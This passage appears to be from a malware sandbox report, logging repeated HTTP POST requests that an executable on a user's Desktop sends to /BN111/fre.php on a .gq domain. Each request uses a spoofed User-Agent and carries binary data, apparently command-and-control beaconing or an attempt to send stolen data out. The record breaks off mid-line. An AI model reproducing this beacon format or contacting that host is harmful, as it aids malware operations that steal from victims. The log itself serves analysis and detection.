Oct 14, 2021 08:29:18.129460096 CEST	2122	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NEEHx%2BkmIT9asVndpNXR1AoGjnCHChsMAYShF5yGwYqEj%2FgJsdB0Mx0KbcltXiFP56kkMvROqu%2FHNChiSzQKeS2N34dJxa42lt0RG86mw%2F6702IFnVtlIfN7UOJyiytUwY3ivfQHS555wFEzMe%2FIT1fowiWd1w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec0a39b634e8b-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.6	49864	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:20.400475025 CEST	2123	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:20.518090010 CEST	2124	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4smlu4lSWaMUj8PWc%2BGpmke%2BENRvCwicQAhGufEzY4Xwa7kc3y6YhyyyYu%2BwPR0zEsPEe1hN0%2BiA2kWHr%2FJE%2BXajyLuEfTCC38E6%2FySGXkOUU0sGE9B9d2NunzFnN9Jpxmznzq%2BWLqFLCc88Y6o8kCh%2BJdWbng%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec0b28e524e5c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.6	49870	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:21.825018883 CEST	2128	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:21.940284967 CEST	2129	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rzu%2FohVuhjczWDe7tSOrF0uRiMZdPJrfjpN1hISShviTn6CxquhhvYU2ZYQ2Afh3g6P1FuSAKzKR6pmpqQCL727H0cqqtCgKFYjeXiZlAHmuAv%2B5N6h1XDjgPB5X%2FZuAlzCAkAnMt54YuBWaZYpOMDRgoMijug%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec0bb69254339-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.6	49871	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:23.419826031 CEST	3440	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:23.542494059 CEST	3948	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PIDL4Ex4yVSKIruz6ska5ciNfQXYfiK08MG3n%2Fl5sBh3uTbHelpQ%2BjFtXJazHaCXD%2FcS9T%2FNICexg23jtCzdGJnXlzeuuDLWonv2ZPeq4lMjDt5h2txZPLlLYA9u9inYXLCUr1h1CBSjz2d%2B08xCKW78cQE3ng%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec0c56e57d6d1-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.6	49872	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:27.468224049 CEST	7347	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:27.586599112 CEST	7348	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7ltrm6sBYZ30PkF8Z7VQJ7TUsrGZvzAnFrCkFXlgpwUKIwSLl0AKErABPq3oLlrSThb2YL8K3CEZTNit0GLpNLsiF78D%2Bo%2FeB6vJTTi3fwh0lA8bdxzosx88%2BepGYJVN9NOxQjuwGMKesX%2FSg1REiYGp8lFNnQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec0debb1b68f7-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.6	49873	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:29.646629095 CEST	7349	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:29.765604973 CEST	7350	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tR8YTHsFUlHBp8jLYHNxWg6PfHZ0Q9qY6Z3f00iw%2FRPkfDCJWPs2NCsHs%2BJRNc7qtmk0cQf9cr5pQNsUFXF%2BJcUJy6DqBggagu08v%2BAxRuxiMb5hoOAO2BqKdlUHQOZJ0B4Pm%2FOMKal28DTap0fJzQTMHSpwyg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec0ec5bd44401-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.6	49875	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:31.734477043 CEST	7352	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:31.847372055 CEST	7353	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L2EsWzEZJKWTDEn93sKWFLzev8Sl0yir0x01b%2BkSL3ujzOb1%2BV3ppWcxuzQdjug6QJKPfPBqA70PVP6l0gcrvl1Nke8DdVo%2BNZdDAhag%2BRgxa5KekRs3f6n4KUeQs4FC1ErSaLb8kvrBEaD%2FKEum9jCbi9W6LA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec0f9584568fe-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.6	49876	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:33.006582975 CEST	7811	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:33.126630068 CEST	7812	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wa5i4pYc47XTZTSRKuePuJGDKfzroVXSpP4vHBUDcpsntok8NHAncV7jpTLBPs6CkrH8kUIW9ytBz2JwxWNyMqJw1jmWzD%2Fy1Bnna2df9JCgcS%2Fw7JdgzCjsdEOd%2BbuV0ccxxBXnyytwG6K3l%2FcIIvtKwmy4fQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec1015b90702b-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49784	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:24.885116100 CEST	1064	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:25.039886951 CEST	1065	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TUPKE8D4UGkHYeoSd0yWKGHpiVyKRj77CORXDe0%2F1O83cFqfjhqZ0VrDKDJl5PNFM1d7k7a%2BakFbs2fwMXUXRPnpAD93uQfrQNlF5%2B5FUNRmWTFz4Fi75GfzaL9mPeByBQ%2BOUK4b0qNxYwgtN4fwhqW64C7hPA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debf578ab14e5c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.6	49878	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:35.265240908 CEST	7813	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:35.384254932 CEST	7814	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=68hgMnUBuHCsDUjLDFpqWCCQ2g0nALTKRqB%2BkiRtXAxjxPALNlT80KDT0GEMZAtpHUyMeDuNH4MC3L2MUas1uw3Tkjx5nm6dtpUi4kAfnIyf5i1cJw47x%2BYEBToHMbM6J5K1gQPhnXfkSWBbeb76%2Bs%2F4PqZQXA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec10f6862646d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.6	49883	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:36.968308926 CEST	7820	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:37.123816013 CEST	7823	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YUMi%2BKCQiebAYfk%2BBHidFFMjdX1L%2B1Iti6n0n9f53wMYFdVumBnToBBg78Fzogxr7V3VykOGcApOxm9l1ZNdwS3q1NBnlV56c4eet1gWdXUfPWzTFfWnX4HH4BnbmoIGtizbJCTdvwv6CXf3B0vdLyoWMpNG7g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec11a19e04a7f-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.6	49890	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:38.139185905 CEST	7840	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:38.253525972 CEST	7844	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R6o5MMg7SbvUqktXOhLjA1Fnbswl29jahtPLPtZB%2F4x11eIb1xozO%2BsAnzF9weZv0qW6u4hDKdl%2FulXZxPK440HB6R9%2BHt10S57wJou4G%2B1ynyQn8M318af4%2FOta46SlgLFPdMQ9Fk1N%2Bbz9IjlO9LnEHUhfxw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec1216ed06927-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.6	49897	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:39.373198032 CEST	7857	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:39.677830935 CEST	7861	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hGTok4Pwn41ZRv1MumUHtTCRvKskuQeV7Tzz2LKP7TXQ%2BjHQX%2Bdc7hCUk0B93YW6i4W3l25Za7zFA9%2BUgikpTke7QSUXWzExiifQ89U8wsISzKRfHFHuLqm%2BOsRCRCWUlSjMQHz33ABcV%2F%2BHbvOmCP2te4WgCQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec1291bfb6943-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.6	49905	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:40.707680941 CEST	7874	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:40.835604906 CEST	7876	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1W6FUoErQkVxlBPw7%2BXATW83hqhBSlVS6%2FhzlhKejgcPspDjQWYsm3X5UX3pJCE9Ts7B%2BzefPUHY%2BB%2BB8iI5yQqS8bnXyeWA6pA0FPv3X6QGWOzitWjJfeequ1dvbp%2FoQG57ZdzOBYGjNXOLdmI%2FpOQ67mjazg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec1317c562c32-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.6	49910	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:41.873661041 CEST	7887	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:41.995091915 CEST	7889	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GO6eCdCM4%2F6hA7dtd%2FoaiUrVjzpTaEYd0xVhp5YRWC%2BcFYd%2B827KZzyPcBHQZIMwEPE1lsx4Y%2FXrxohcjCmA2j%2FkkXNqUbdwkLVmbF7cdjV7n1NxRpQeMBRyy%2FLA0LTuL7Nvjpyb%2Buz9nG1ScVdle1E27JKKHw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec138b9821456-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.6	49911	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:43.281959057 CEST	7889	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:43.452020884 CEST	7891	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CxsCHuzow%2F33c%2FCkji95GCcFRRddEjpXSTQlsgwfn1tNfjUG93xxIl1QFhyVjuOCfzG3xO4Dx0oqdciEFdAMIjFtDzSwsy%2BZAnBFJ%2BUIcvKJcPAL57TCTabS1rK7mISZlPofKYNa1NQhc21szCDAJAXGAw7LbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec14189124e0d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.6	49912	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:44.429017067 CEST	7891	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:44.601130962 CEST	7893	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MFrv0XyktSeHA%2B%2FfE1zcEPcFFNmyDk1d8pBeW%2BPZ0DJJyDKM24IqF9Ua%2FLPJGa2QUt1%2F9p1PJhMy%2FqaXGD1%2FbCm79J0uGI0QAXTq9IQa9oVo94V3focmH3c91ymeJg1qFR1TPjejGWcfhJ7eFrLUoAL7XbrPtQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec148ba214e14-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.2.6	49913	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:45.763144970 CEST	7894	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:45.873655081 CEST	7895	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RW1TGqFwuxrswdzsjqOAixFxJjq9GdKUdYo7aOj19dNBG4Lyyy7SsCmQykgjcONrTmazNouCKp2Z9hD9oj9zcv4osPlARNNPDj7pHenc2sXbowSWmyPcUlYaDlCHIFiv0mk3hl9DBkS9teWGWpN7dgSnssg4aw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec1510989d70d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.2.6	49914	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:46.923367023 CEST	7896	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:47.043380976 CEST	7897	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tSBa4s2D4P4jpBx6UmblYjjTd9CZpovgF%2BPWqgNr38olq5O0aV%2BRwk6guUtz2KJcSkWnxUnrdqNk5vMbb8hVzaTtDOCB%2BcJpa1cxebjsNw2fxMN7oJxmUx78qf%2BG%2FL3VMFTIyyLXSMoDYeD9fnUR9J7qMZA67A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec1584bd8d729-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 